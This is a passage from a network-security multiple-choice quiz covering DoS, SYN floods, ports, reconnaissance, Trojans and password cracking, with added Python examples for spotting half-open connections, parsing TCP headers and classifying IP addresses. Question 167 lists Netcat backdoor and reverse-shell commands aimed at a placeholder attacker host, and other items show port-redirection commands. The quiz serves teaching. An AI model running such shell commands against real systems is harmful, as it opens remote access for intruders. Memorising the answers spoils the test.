c. Black Hats
d. White Hats

95. Identify one method to defend against a DDoS attack that works by locally stopping services.
a) Apply the principle of providing least privilege rights to user.
b) Implement per user limits on the consumption of file system space, memory and CPU usage.
c) Deploy some system monitoring software that can detect when system resources are running low.
d) Keep your system regularly patched and apply relevant security bug fixes.

96. You suspect one of your servers may have succumbed to a SYN flood attack. Which one of the following tools might you consider using to help confirm your suspicions?
a) Netstat
b) Ping
c) Tracert
d) Ipconfig

97. Which of the following is NOT a correct countermeasure against SYN flooding?
a) increase the size of the connection queue
b) have redundant communication links to sensitive systems that must be connected to the Internet at all times.
c) use SYN cookies
d) Do not dole out user privileges carelessly
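Putting question 96 into practice: the following Python script is an added example, not part of the original quiz. It parses netstat -ant style output and counts half-open (SYN_RECV) connections per local port and per remote host, which is the first thing to check when a SYN flood is suspected; those half-open entries are what fill the connection queue that question 97 talks about enlarging. The netstat lines are constructed for the example and the threshold of 3 is an assumption for illustration; the real connection queue size is OS dependent.

```python
import re
from collections import Counter

# Constructed sample of `netstat -ant` style output (not a real capture).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.0.0.5:80             203.0.113.7:51201       SYN_RECV
tcp        0      0 10.0.0.5:80             203.0.113.7:51202       SYN_RECV
tcp        0      0 10.0.0.5:80             203.0.113.7:51203       SYN_RECV
tcp        0      0 10.0.0.5:80             198.51.100.9:44010      ESTABLISHED
tcp        0      0 10.0.0.5:80             203.0.113.7:51204       SYN_RECV
tcp        0      0 10.0.0.5:22             192.0.2.33:60111        ESTABLISHED
tcp        0      0 10.0.0.5:80             203.0.113.8:51205       SYN_RECV
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
"""

# One netstat TCP line: proto, recv-q, send-q, local, foreign, state.
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+"
    r"(?P<local>\S+)\s+(?P<remote>\S+)\s+(?P<state>[A-Z_]+)\s*$"
)


def parse_netstat(text):
    """Yield (local, remote, state) for every TCP line; header lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("local"), m.group("remote"), m.group("state")


def split_endpoint(endpoint):
    """Split 'host:port' into (host, port); LISTEN sockets carry '*' as port."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def half_open_summary(text):
    """Count SYN_RECV (half-open) connections.
    Returns (total, Counter by local port, Counter by remote host)."""
    by_port, by_remote, total = Counter(), Counter(), 0
    for local, remote, state in parse_netstat(text):
        if state != "SYN_RECV":
            continue
        total += 1
        by_port[split_endpoint(local)[1]] += 1
        by_remote[split_endpoint(remote)[0]] += 1
    return total, by_port, by_remote


def looks_like_syn_flood(text, threshold=3):
    """Return {port: half_open_count} for ports at or above the threshold.
    The threshold is an illustrative assumption, not an OS constant."""
    _, by_port, _ = half_open_summary(text)
    return {port: n for port, n in by_port.items() if n >= threshold}


if __name__ == "__main__":
    total, by_port, by_remote = half_open_summary(SAMPLE_NETSTAT)
    print("half-open:", total, "by port:", dict(by_port), "by remote:", dict(by_remote))
    print("suspect ports:", looks_like_syn_flood(SAMPLE_NETSTAT))
```

On a live host, feed the script the real output (for example `netstat -ant | python3 synrecv.py` after replacing SAMPLE_NETSTAT with `sys.stdin.read()`); a single remote host owning most of the SYN_RECV entries points at one source, while many spoofed sources show up as a flat spread across by_remote.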

98. Which of the following is a probable cause of a hacker creating a back door in a system?
a) The hacker is trying to guess the credentials of the user.
b) The hacker is trying to get access without having to authenticate.
c) The hacker is trying to get personal information from the user over the phone.
d) The hacker is trying to connect to the user's wireless home network.

99. Which of the following are TRUE about a Script Kiddie?
i. With low-level hacking skills
ii. Use released tools and software to exploit without understanding the underlying vulnerability
iii. Biggest group of attackers and usually rather immature
iv. Use Social Engineering technique

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

100. Passwords can be intercepted as they move through networks via which of the following?
a) Keyboard sniffers
b) Password sniffers
c) Trojan horses
d) Cookies

101. Which of the following is the process of identifying and reducing risk to a level that is comfortable and then implementing controls to maintain that level?
a) Return on investment
b) Risk
c) Risk analysis
d) Risk management

102. Which of the following is the best option for a network administrator to prevent an attacker from figuring out users' IDs or passwords?
a) Session Hijacking
b) URL Session Tracking
c) Disable cookies
d) Hidden form elements

103. Which of the following statements is FALSE about ICMP (Internet Control Message Protocol)?
a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks
b) ICMP “mapping” is often conducted via a ping sweep
c) ICMP manipulates the time-to-live (TTL) option in UDP packets
d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

104. The TCP/IP family of protocols includes several components:
i. Transmission Control Protocol (TCP);
ii. User Datagram Protocol (UDP);
iii. Internet Protocol (IP);
iv. Internet Control Message Protocol (ICMP)

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

105. Illegal or unauthorized zone transfers are a significant and direct threat to what type of network server?
a) Web
b) DHCP
c) DNS
d) Database

106. ________ is the protocol Microsoft uses to share files, printers, and serial ports, and also to communicate between computers using named pipes.
a) Server Message Block (SMB)
b) Resource Control Block (RCB)
c) Traffic Message Block (TMB)
d) Communication Message Block (CMB)

107. Which of the following measures can be used to defend against Network Mapping?
i. Filter out the underlying messages that network mapping tools rely on by using firewalls and packet filtering routers;
ii. Block incoming ICMP messages;
iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;
iv. Close all unused ports to prevent an attacker from discovering open ports on your machine

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

108. You can start to build defenses for your information system by creating security ____________.
a) foundations
b) baselines
c) pillars
d) planes

109. Under the phases of attack, a DoS (Denial-of-Service) Attack is considered as which phase?
a) Reconnaissance;
b) Scanning;
c) Gaining Access;
d) Maintain Access;

110. Which type of Buffer Overflow Exploits allows attacker to access the system as an impersonated root user?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

111. Which of the following techniques are considered Malformed Packet DoS Attacks?
i. Land
ii. Ping of Death
iii. Rose
iv. Bonk

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

112. The following command is run on the PC with IP address 192.168.1.2. What does it mean?
fpipe -l 1000 -r 5000 192.168.1.23
i. It is port redirection;
ii. Setup the PC (192.168.1.2) to listen on port 5000;
iii. PC 192.168.1.2 will pick up traffic entering at port 1000;
iv. Traffic arriving at port 1000 will be redirected to PC 192.168.1.23 at port 5000.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

113. You are the security administrator for a bank. The users are complaining about the network being slow. However, it is not a particularly busy time of the day. You capture network packets and discover that hundreds of ICMP packets have been sent to the host. What type of attack is likely being executed against your network?
a) Spoofing
b) Man-in-the-middle
c) DNS kiting
d) Denial of service

114. Which of the following is NOT a functionality of BOT software?
a) DoS flood
b) File morphing
c) Special UDP port scanning
d) E-mail address harvester

115. The File Transfer Protocol (FTP) can be accessed by each of the following except ________.
a) Web browser
b) FTP client
c) command line
d) LPTP server

116. The Transmission Control Protocol/Internet Protocol (TCP/IP) protocol that handles outgoing mail using port 25 is ______.
a) Simple Mail Transfer Protocol (SMTP)
b) Post Office Protocol (POP)
c) Internet Mail Access Protocol (IMAP)
d) Secure/Multipurpose Internet Mail Extensions (S/MIME)

117. What is the best measure to keep zombies off the system?
a) limit bandwidth
b) install DDoS detection and throttling tools on your network
c) employ egress anti-spoof filters on external routers or firewall.
d) deploy filters upstream to block flood traffic.

118. Which of the following represent the pool of well-known ports?
a) 0 through 255
b) 0 through 1023
c) 0 through 49151
d) 1024 through 49151

119. The way to prevent an attacker from discovering open ports on your machine is to _______.
a) close all unused ports
b) assign strong passwords to all ports
c) hide all ports
d) terminate services on open ports

120. Which of the following advantages are associated with using a firewall?
a) It provides an inexpensive means to share the Internet connection.
b) It is used to block undesired external access to internal network resources.
c) It is used to monitor the use of Internet by internal users.
d) It is used to hide the internal addressing scheme of the network.

121. After running John the Ripper, the cracked password is stored in a local file called ________.
a) John.pot
b) Ripper.pot
c) Password.pot
d) Crack.pot

122. General types of reconnaissance data that can be obtained from the Internet are:
i. Employee data
ii. Business partner
iii. Existing technologies
iv. Financial information

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

123. Internet search engines are used by attacker because they provide the following facilities except ________.
a) Internet directories
b) Link crawlers
c) Caches
d) Hyperlinks

124. Which software tool can be used for cracking Windows 95, Windows 98, SQL 2000, Cisco PIX and router MD5 hashes?
a) John the Ripper
b) Brutus
c) Super Cracker
d) Cain

125. An attack that opens numerous ports for bogus connections, thereby denying legitimate connections, is called a ______.
a) ACK Flood
b) TCP/UDP Flood
c) Port Flood
d) SYN Flood

126. Which of the following statements is FALSE about Risk Management?
a. Risk can be qualitatively defined in three levels: Low, Medium and High
b. Risk Management is about Security
c. Risk management determines the value of the resources and the level of security for it
d. Threat + Vulnerability = Risk

127. A(n) __________ is a weakness that allows a threat agent to bypass security.
a) vulnerability
b) exploit
c) risk
d) mitigation

128. Which of the following is an advantage of using virtual machines?
a) Reduces the need to install OS software updates.
b) Allows an OS to run in its own separate, secure area on a system.
c) Helps secure the hardware from unauthorized access.
d) Anti-virus software has to be installed only once.

129. A host has an IP address of 128.78.3.2. The network is subnetted by borrowing the first 3 host address bits. What is the subnet mask for 128.78.3.2?
a) 255.255.224.255
b) 255.255.0.0
c) 255.255.255.224
d) 255.255.224.0

130. Each of the following protocols can be used to encrypt transmissions over the Internet except _________.
a) Common Gateway Interface (CGI)
b) Secure Sockets Layer (SSL)
c) Personal Communications Technology (PCT)
d) FORTEZZA

131. The following are commonly used techniques for reconnaissance except ________.
a) Low-technology reconnaissance
b) Web searches
c) Whois database analysis
d) High performance hardware

132. Which of the following IP address class is reserved for future use?
a) Class A
b) Class C
c) Class D
d) Class E

133. There are two ways that a SYN flood can exhaust the communication resources of a target:
i. Flood the connection queue;
ii. Flood the entire communication link;
iii. Flood the switch;
iv. Flood the router.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

134. Which of the following are TRUE about a DDoS (Distributed Denial-of-Service) attack?
i. Distributed Denial-of-Service is a simple SYN flood that allows an attacker to generate traffic from one machine
ii. The attacker first takes over a large number of victim machines around the world, often referred to as zombies.
iii. The zombie software is the component of the DDoS tool that waits for a command from the attacker, who uses a client tool to interact with the zombies
iv. Tribe Flood Network 2000 (TFN2K) is one of the most fully featured DDoS-specific tools

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

135. What is the name of the unique physical address that is assigned to every network interface card?
a. IP address
b. Hostname
c. MAC address
d. NetBIOS name

136. What does an attacker do in Reconnaissance Phase?
i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack
ii. The core of Reconnaissance attack is intrusive information gathering techniques
iii. System is breached or accessed in order to retrieve information

a. i only;
b. i and ii;
c. i, ii and iii;
d. None of the above.

137. A(n) _______ identifies what program or service on the receiving computer is being accessed.
a) process
b) UPD designator
c) port number
d) service-initiated socket (SIS)

138. Which of the following is a coordinated effort in which multiple machines attack a single victim or host with the intent to prevent legitimate service?
a) DoS
b) Masquerading
c) DDoS
d) Trojan Horse

139. Which of the following statements is FALSE about the key terms used in the risk management process?
a. A Resource is anything in an environment that you are trying to protect
b. A Threat is a resource that can be accessed by making use of a vulnerability in your environment
c. A Vulnerability is a point where a resource is susceptible to attack
d. Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

140. IP resides at which layer of the OSI model?
a) Application
b) Data Link
c) Network
d) Physical

141. The qualities and characteristics of the network traffic generated by Nmap's ping scan are called its _________.
a) signature
b) socket
c) scan profile
d) stealth

142. Which of the following statements are TRUE about Trojan horses?
i. Most Trojan horses have two parts: Server and Client;
ii. The server-program part is a program or file that is installed on the victim’s machine;
iii. The client-program part is on the attacker’s system;
iv. Trojan horse attacks pose one of the most serious threats to computer security.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

143. An attacker normally takes inventory of which type of ports on the system?
a) well done ports.
b) easy ports.
c) open ports.
d) unsecured ports.

144. What is the usage of Cookie?
a) to prevent sniffing
b) to prevent ARP cache poisoning
c) to prevent spoofing
d) to prevent SYN flooding

145. Which of the following is FALSE about User Datagram Protocol (UDP)?
a) It is a connection-oriented protocol
b) Transmitted packets are not put in order
c) No retransmission of lost packets
d) No acknowledgement or session tear down required

146. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.
a) 65536 and 65536
b) 32768 and 32768
c) 32768 and 65536
d) 65536 and 32768

147. You connected your company to the Internet, and security is a concern. What should you install?
a) Higher-quality servers
b) Firewall
c) DNS
d) Switches

148. A port scanner has reported that your web server running with a supporting SQL database is listening on TCP ports 80, 443, 21, and 1433. Which of these ports is unnecessary and should be closed to prevent hacking attempts?
a) 80
b) 21
c) 1433
d) 443

149. Each of the following is intended to protect information except __________.
a) people
b) policies
c) equipment
d) confidentiality

150. An attacker can ask the server to send all the information it has about a given domain by requesting a ________ from the name server.
a) domain transfer
b) nslookup
c) zone transfer
d) display all

151. Which application-level Trojan backdoor is able to modify or replace critical operating system executable programs or libraries?
a) Operating-Mode Rootkits
b) System-Mode Rootkits
c) User-Mode Rootkits
d) Kernel-Mode Rootkits

152. Each of the following is an attribute that should be compiled for hardware when performing an asset identification except __________.
a) the name of the equipment
b) the manufacturer's serial number
c) the MAC and IP address
d) the cost

153. Which of the following is NOT a well-known TCP port number?
a) 8888
b) 53
c) 80
d) 25

154. An attacker with low skill level is called ______?
a. Cracker
b. Hacker
c. Script Kiddie
d. Phreaker

155. _______ is the interception of network data not intended for the machine that is intercepting the traffic.
a) Packet sniffing
b) Packet spoofing
c) Packet stealing
d) Packet engineering

156. The following are useful data elements from a Registrar Whois search except _______.
a) Names
b) Registration dates
c) Hardware models
d) Name servers

157. A person wishing to prevent users from accessing a web server and the information on it would try a ____ attack.
a) web service
b) denial of service
c) system service
d) internet service

158. Attackers known as ____________ like to think of themselves as an elite group who are performing a valuable service in identifying security weaknesses.
a) crackers
b) script kiddies
c) hackers
d) cyberterrorists

159. Which of the following is NOT a functional feature of Kernel-Mode Rootkits?
a) Hide an attacker's processes.
b) Hide selected types of events from the Windows Event Viewer.
c) Hide the ports used by an attacker.
d) Hide device drivers, including itself, so an administrator cannot see them installed on the system.

160. Which of the following is not a feature or capability of a port scanner?
a) Determine open ports
b) Determine active services
c) Determine target OS
d) Determine weakness of OS

161. What is the purpose of a site survey?
a) Improve wireless signal strength
b) Eliminate unwanted access locations
c) Distribute WEP keys
d) Plan the design of a wired network

162. During an audit of a server system log, which of the following entries would be considered a possible security threat?
a) Five failed login attempts on an admin account.
b) Two successful logins with the backup account.
c) A 500K print job sent to a printer.
d) Three new files saved in the accounting folder by user finance.

163. In order to determine which class any IP address is in, one should examine the first _____ bits of the IP address.
a) 8 bits
b) 3 bits
c) 4 bits
d) 5 bits

164. Which of the following software is a good port scanning tool?
a) Telnet
b) Nmap
c) ipconfig
d) portscan

165. Which software tool can be used for sniffing passwords?
a) John the Ripper
b) Brutus
c) John the Sniffer
d) Cain

166. You are connected to a server on the Internet and you click on a link on the server and receive a time-out message. What layer could be the cause of this message?
a) Application
b) Transport
c) Network
d) Physical

167. Which Netcat command is used as a backdoor on Windows systems?
a) c:\>nc -l -p 12345 -e cmd.exe
b) c:\>nc -l -p 12345 -e /bin/sh
c) c:\>nc -l -p 12345 -e ncrelay.bat
d) c:\>nc [attackers_machine] 12345 -e /bin/sh

168. In the TCP header, there are ______ TCP control bits, also known as the TCP flags.
a) 6
b) 7
c) 8
d) 9
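As an added example (not from the original quiz) for questions 72, 146 and 168: the following Python code builds and parses the fixed 20-byte TCP header, showing the 16-bit source and destination ports and the six RFC 793 control bits, and labels flag combinations the way a scanner's response logic or an IDS rule would. It assumes headers with no options, and the checksum is left at zero because the header is never put on the wire.

```python
import struct

# The six control bits of RFC 793, listed from the least significant bit
# upward. RFC 3168 (ECN) later defined CWR and ECE in the two bits above URG.
TCP_FLAGS = ("FIN", "SYN", "RST", "PSH", "ACK", "URG")
HEADER_FMT = "!HHIIHHHH"   # ports, seq, ack, offset/flags, window, checksum, urgent
MAX_PORT = 0xFFFF          # port numbers are 16-bit: 65,536 values (0..65535)


def build_tcp_header(src_port, dst_port, seq, ack, flags, window=65535):
    """Build a minimal 20-byte TCP header with no options (checksum left 0).
    `flags` is an iterable of names taken from TCP_FLAGS."""
    for p in (src_port, dst_port):
        if not 0 <= p <= MAX_PORT:
            raise ValueError(f"port {p} does not fit in 16 bits")
    bits = 0
    for name in flags:
        bits |= 1 << TCP_FLAGS.index(name)
    data_offset = 5                          # header length in 32-bit words
    offset_flags = (data_offset << 12) | bits
    return struct.pack(HEADER_FMT, src_port, dst_port, seq, ack,
                       offset_flags, window, 0, 0)


def parse_tcp_header(raw):
    """Parse the fixed 20-byte part of a TCP header.
    Returns ports, seq/ack numbers, header length in bytes and the set flags."""
    if len(raw) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    (src, dst, seq, ack, offset_flags,
     window, _checksum, _urgent) = struct.unpack(HEADER_FMT, raw[:20])
    header_len = (offset_flags >> 12) * 4
    bits = offset_flags & 0x3F               # the six control bits
    flags = {name for i, name in enumerate(TCP_FLAGS) if bits & (1 << i)}
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "header_len": header_len, "window": window, "flags": flags}


def classify_segment(hdr):
    """Label a segment by its flag combination, as a scanner or IDS rule would."""
    f = hdr["flags"]
    if f == {"SYN"}:
        return "SYN (connection request)"
    if f == {"SYN", "ACK"}:
        return "SYN/ACK (connection accepted)"
    if "RST" in f:
        return "RST (port closed or connection refused)"
    if not f:
        return "NULL probe (no flags set)"
    if f == {"FIN", "PSH", "URG"}:
        return "Xmas probe (FIN/PSH/URG)"
    if f == {"FIN"}:
        return "FIN probe"
    return "data or acknowledgement"


if __name__ == "__main__":
    syn = build_tcp_header(51234, 80, seq=1000, ack=0, flags=["SYN"])
    parsed = parse_tcp_header(syn)
    print(parsed, "->", classify_segment(parsed))
```

The same parser works on a real capture: slice the TCP header out of the IP payload (the IP header length is in its own IHL field) and pass those bytes to parse_tcp_header.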

169. Which of the following is NOT a countermeasure for password attacks?
a) adopt a strong password policy.
b) educate users in security awareness.
c) conduct password cracking tests.
d) store encrypted or hashed password files in user accounts.

170. HTTP, FTP and Telnet work at which layer of the OSI model?
a) Application
b) Presentation
c) Session
d) Transport

171. Which of the following is a weak password policy?
a) use minimum of nine alphanumeric characters
b) implement password aging
c) use passphrases
d) use dictionary-form passwords

172. Which type of Buffer Overflow Exploits will cause the operating system to shutdown or crash?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

173. Which software is used to extract password representations?
a) Cracker
b) John the Ripper
c) Pwdump3
d) Brutus

174. For DoS (Denial-of-Service) Attack, stopping service can be achieved by:
i. Process killing
ii. Process crashing
iii. System reconfiguring
iv. Malformed packet attacks

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

175. _______ is the method used by Nmap to determine the operating system of the target computer.
a) Stack fingerprinting
b) OS fingerprinting
c) Banner stamping
d) OS stamping

176. Metasploit offers a huge set of _____, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself.
a) payloads
b) options
c) utilities
d) exploits

177. The Internet is “managed” by
a. APNIC
b. ICANN
c. AfriNIC
d. ARIN

178. A password cracker is needed to quickly rediscover a password. It is believed the password is only seven characters long, but was computer generated. Which of the following techniques would be the best method to use?
a) Online guessing
b) Dictionary
c) Brute force
d) Hybrid

179. Each of the following is a characteristic of information except __________.
a) integrity
b) confidentiality
c) conformity
d) availability

180. The use of Domain Name System (DNS) is to _________.
a) translate a computer's domain name into its appropriate IP address.
b) translate an IP address into its appropriate computer domain name.
c) translate a computer's IP address into its appropriate MAC address.
d) check for the correct computer domain name.

181. Which of the following is a hardware or software system used to protect a network from unauthorized access?
a) Firepot
b) Windows XP
c) Honeypot
d) Firewall

182. Which one of the following is not a private IP address?
a) 10.1.2.1
b) 165.193.123.44
c) 172.18.36.4
d) 192.168.0.234
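Added example (not part of the original quiz) tying together questions 129, 132, 163 and 182: the following Python code classifies an IPv4 address by the leading bits of its first octet, subnets a classful address by borrowing host bits, and recognises the loopback block and the RFC 1918 private ranges. It uses only the standard ipaddress module; the function names are this example's own.

```python
import ipaddress

# RFC 1918 private ranges and the loopback block (127/8).
RFC1918 = [ipaddress.IPv4Network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOOPBACK = ipaddress.IPv4Network("127.0.0.0/8")
CLASSFUL_PREFIX = {"A": 8, "B": 16, "C": 24}   # default mask length per class


def ip_class(addr):
    """Classful category from the leading bits of the first octet:
    0xxx -> A, 10xx -> B, 110x -> C, 1110 -> D (multicast), 1111 -> E (reserved)."""
    first_octet = int(ipaddress.IPv4Address(addr)) >> 24
    if first_octet >> 7 == 0b0:
        return "A"
    if first_octet >> 6 == 0b10:
        return "B"
    if first_octet >> 5 == 0b110:
        return "C"
    if first_octet >> 4 == 0b1110:
        return "D"
    return "E"


def subnet_info(addr, borrowed_bits):
    """Subnet a classful address by borrowing `borrowed_bits` host bits.
    Returns mask, network, broadcast (as strings) and the usable host count."""
    cls = ip_class(addr)
    if cls not in CLASSFUL_PREFIX:
        raise ValueError(f"class {cls} addresses are not subnetted")
    if not 0 <= borrowed_bits <= 30 - CLASSFUL_PREFIX[cls]:
        raise ValueError("borrowed bits must leave at least 2 host bits")
    prefix = CLASSFUL_PREFIX[cls] + borrowed_bits
    # strict=False lets us pass a host address and get its enclosing network.
    net = ipaddress.IPv4Network(f"{addr}/{prefix}", strict=False)
    return {"mask": str(net.netmask),
            "network": str(net.network_address),
            "broadcast": str(net.broadcast_address),
            "usable_hosts": net.num_addresses - 2}


def address_kind(addr):
    """Distinguish loopback, RFC 1918 private, multicast, reserved and public."""
    ip = ipaddress.IPv4Address(addr)
    if ip in LOOPBACK:
        return "loopback"
    if any(ip in net for net in RFC1918):
        return "private"
    cls = ip_class(addr)
    if cls == "D":
        return "multicast"
    if cls == "E":
        return "reserved"
    return "public"


if __name__ == "__main__":
    print(ip_class("128.78.3.2"), subnet_info("128.78.3.2", 3))
    for a in ("10.1.2.1", "165.193.123.44", "172.18.36.4", "192.168.0.234"):
        print(a, address_kind(a))
```

Note that 172.16.0.0/12 covers 172.16.x.x through 172.31.x.x only, so 172.32.0.1 is public; the explicit network check above avoids that classic off-by-one.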

183. The most widely-deployed tunneling protocol is _________.
a) L2TP
b) RADIUS
c) PPP
d) PPTP

184. What port does the NetBus server listen on?
a) 12345
b) 12346
c) 12347
d) any number greater than 12347

185. Which of the following SuperScan tools is used to uncover the user account list on the target machine?
a) User Account Exploit
b) User engineering
c) Windows Enumeration
d) Windows User Exploit

186. Which of the following best describes a vulnerability?
a) A weakness in the configuration of software or hardware that could allow a threat to damage the network
b) Any agent that could do harm to your network or its components
c) The likelihood of a particular event happening given an asset and a threat
d) Measures the cost of a threat attacking your network

187. Which of the following is associated with behaviors such as collecting personal information or changing your computer configuration, without appropriately obtaining prior consent?
a) Trojan
b) Botnet
c) Spyware
d) Rootkit

188. You suspect that a system is infected with a Trojan Horse program and is sending data outbound from the system. Which of the following can be used to detect this activity?
a) Anti-spam software
b) Pop-up blocker
c) HIDS
d) Personal firewall

189. The most effective method of defending against social engineering is _________.
a) user awareness
b) strong password
c) anti-social
d) high end security tools

190. In Microsoft Windows, the name of the background program, such as Svchost.exe, is called a ________.
a) process
b) service
c) display service
d) parent service

191. Each of the following is a hacker's activity profile category except __________.
a) black hats
b) white hats
c) green hats
d) grey hats

192. What is usually the first phase conducted before doing a site penetration?
a) Information gathering
b) Cracking
c) Social engineering
d) Spoofing

193. Each of the following is an authentication technology except _________.
a) IEEE 802.11b
b) RADIUS
c) TACACS+
d) IEEE 802.1X

194. Which of the following is a correct URL of a web site using the SSL protocol?
a) http://www.sp.edu.sg
b) httpssl://www.sp.edu.sg
c) http://www.sp.edu.sg/ssl
d) https://www.sp.edu.sg

195. Which of the following protocol does Ethereal indicate when you launch a Web browser?
a) HyperText Transfer Protocol (HTTP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Internet Control Message Protocol (ICMP)

196. A network-based IDS is not suitable for detecting or protecting against which of the following?
a) E-mail spoofing
b) Denial-of-service attacks
c) Attacks against the network
d) Attacks against an environment that produce significant traffic

197. What is the purpose of Banner grabbing?
a) Is to grab the version of operating system used by target machine and its exploits.
b) Is to grab the message of the day banner from the network router.
c) Is to gain access to the system to look for which Web Server Application is running, its version and exploits.
d) Is to extract a copy of the Web server home page.

198. One reason employees are so successful at attacking their company's computers is __________.
a) they have superior networking skills
b) employees already have access to some company information
c) a company's information security is focused on keeping out intruders
d) employees have unlimited access to company computers

199. _______ and _______ are examples of Trojan programs.
a) Netbus, subseven
b) Netbus, supertrojan
c) Back Orifice, subeight
d) Back Orifice, supertrojan

200. Which is the best countermeasure to social engineering attacks?
a) Preventing the download of mobile code from the Internet
b) Employee training
c) Strong password policies
d) Auditing user activities

201. Which software tool can be used for port redirection apart from WinRelay?
a) PWdump3
b) Remote-Anything
c) Fpipe
d) DCOM RPC Exploit

202. Which protocol uses port 22 by default?
a) Telnet
b) FTP
c) SSH
d) HTTPS

203. Which type of Buffer Overflow Exploits allows an attacker to install backdoor programs on the victim's machine?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

204. A computer system is suspected of carrying a rootkit. What is the most efficient method of removing the rootkit?
a) Install anti-spyware software.
b) Disable the BIOS of the computer system and reboot.
c) Install the latest operating system update patch.
d) Reinstall the operating system.

205. Another name for anonymous FTP is _________.
a) blind FTP
b) free user FTP
c) Freenet
d) Unannounced FTP

206. Performing a ______ scan with Nmap can help an attacker avoid detection.
a) silent
b) secret
c) stealth
d) smooth

207. Each of the following is a phase of a malicious hacker attack except __________.
a) reconnaissance
b) clearing tracks
c) social engineering
d) scanning

208. Which of the following describes a passive attack?
a) Does not insert data into the stream but instead monitors information being sent.
b) Records and replays previously sent valid messages.
c) Inserts false packets into the data stream.
d) Makes attempts to verify the identity of the source of information.

209. Explain the command execution statement as shown: >winrelay -lip 192.168.20.2 -lp 1002 -dip 193.21.74.35 -dp 1020 -tcp
a) TCP traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.
b) TCP traffic is redirected from source 192.168.20.2 at port 1020 to destination address 193.21.74.35 port 1002.
c) TCP traffic is redirected from source 193.21.74.35 at port 1020 to destination address 192.168.20.2 port 1002.
d) Traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.

210. A person who applies his hacking skills for offensive purposes is known as ______.
a) Cracker
b) White Hat
c) Ethical Hacker
d) Phreaker

211. Which of the following is an example of social engineering?
a) An attacker configures a packet sniffer to monitor user logon credentials.
b) An attacker sets off a fire alarm so that he can access a secured area when the legitimate employees are evacuated.
c) An attacker waits until legitimate users have left and sneaks into the server room through the raised floor.
d) An attacker unplugs a user's network connection and then offers to help try to correct the problem.

212. Which of the following statements best describes a zombie?
a) It executes instruction commands simultaneously to conduct a DoS attack. It is triggered by another system which is a client of the attacker's system.
b) It is a Netcat client of an attacker's system. This client in turn triggers a DoS attack at the target system.
c) It is an unintelligent system that attacks the target system with fragmented packets.
d) It is an unintelligent system that sleeps the whole time while its resources are exhausted by a DoS attack.

213. Which of the following is NOT a correct method to enforce a strong password policy?
a) enable the password complexity requirement.
b) use a password filtering program.
c) use a combination of standard and special characters.
d) encourage users to use special and difficult words.

214. You need to have secure communications using HTTPS. What port number is used by default?
a) 53
b) 23
c) 80
d) 443

215. Which of the following is the strongest form of authentication?
a) Biometric
b) Two-factor
c) Something you have
d) Username and password

216. Each of the following is a type of attack except __________.
a) Access Attack
b) Denial of Service Attack
c) Security Attack
d) Repudiation Attack

217. Which of the following tools would be able to capture and view network packets that were transmitting passwords in clear text?
a) Vulnerability scanner.
b) Password cracker.
c) Network mapper.
d) Protocol analyzer.

218. The following are defence practices against DNS-based reconnaissance except _________.
a) domain names should not indicate any machine's operating system type
b) restrict zone transfers
c) block all ports except port 80
d) User Datagram Protocol (UDP) port 53 is used for DNS queries and responses, and must be allowed for DNS to resolve names

219. Each of the following is a characteristic of the Layer 2 Tunneling Protocol (L2TP) except _________.
a) It merges the features of PPTP and Layer 2 Forwarding Protocol (L2F)
b) It requires a TCP/IP network
c) It can be implemented on devices like routers
d) It can support advanced encryption methods

220. To be beneficial to a company, which of the following is the most practical relationship between a security risk and its countermeasure?
a) The cost of the countermeasure should be less than the potential cost of the risk.
b) The cost of the countermeasure should be greater than the potential cost of the risk.
c) The cost of the countermeasure should be less than the cost of the asset.
d) The cost of the countermeasure should be greater than the cost of the asset.

221. What is a default password on a server system?
a) a password that is set by the system manufacturer.
b) a password that is set by the first user.
c) the password is "default".
d) a password that is set by the administrator.

222. The premise behind reconnaissance activities is to profile the following except _________.
a) size of organisation
b) administrative staff
c) network infrastructure
d) an organisation's operations

223. Which TCP/IP utility is most often used to test whether an IP host is up and functional?
a) ftp
b) telnet
c) ping
d) netstat

224. Which of the following is not one of Google's important technologies?
a) Google help
b) Google cache
c) Google index
d) Google bots

225. Which of the following is NOT a type of port scanning?
a) IP Protocol Scan
b) Busy Scan
c) Idle Scan
d) UDP Port Scan

226. What is a blind FTP site?
a) A site where users don't authenticate
b) A site where all traffic is encrypted
c) A site where only anonymous access is allowed
